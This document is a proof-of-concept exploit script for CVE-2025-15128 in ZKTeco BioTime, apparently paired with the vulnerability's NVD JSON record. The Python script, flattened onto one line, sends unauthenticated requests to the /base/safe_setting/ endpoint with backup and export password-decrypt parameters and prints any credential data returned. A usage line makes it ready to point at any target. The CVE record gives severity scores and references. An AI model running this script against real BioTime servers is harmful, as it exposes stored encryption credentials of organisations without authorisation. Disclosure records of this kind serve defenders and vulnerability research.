CVE-2025-15128

import requests import sys # CVE-2025-15128 PoC - ZKTeco BioTime Unprotected Credential Storage # Target: ZKTeco BioTime <= 9.0.3/9.0.4/9.5.2 def exploit(target_url, param_type='backup_encryption_password_decrypt'): """ Exploit IDOR vulnerability to access unprotected credentials param_type: 'backup_encryption_password_decrypt' or 'export_encryption_password_decrypt' """ endpoints = [ '/base/safe_setting/', '/base/safe_setting/index' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint params = {param_type: '1'} print(f"[*] Testing endpoint: {url}") print(f"[*] Parameter: {param_type}") try: # No authentication required (PR:N, UI:N) response = requests.get(url, params=params, timeout=10, verify=False) if response.status_code == 200: print(f"[!] Potential credential data found!") print(f"[*] Response length: {len(response.text)} bytes") print(f"[*] Response preview:\n{response.text[:500]}") return response.text else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-15128.py <target_url>") print("Example: python cve-2025-15128.py http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] print(f"[*] CVE-2025-15128 PoC - ZKTeco BioTime IDOR Credential Leak") print(f"[*] Target: {target}\n") exploit(target, 'backup_encryption_password_decrypt') exploit(target, 'export_encryption_password_decrypt')

{"cve": {"id": "CVE-2025-15128", "sourceIdentifier": "[email protected]", "published": "2025-12-28T09:15:40.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in ZKTeco BioTime up to 9.0.3/9.0.4/9.5.2. This affects an unknown part of the file /base/safe_setting/ of the component Endpoint. Performing a manipulation of the argument backup_encryption_password_decrypt/export_encryption_password_decrypt results in unprotected storage of credentials. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-256"}]}], "references": [{"url": "https://github.com/ionutluca888/IDOR-POC-ZKBio-Time/tree/main", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338506", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338506", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.711813", "source": "[email protected]"}]}}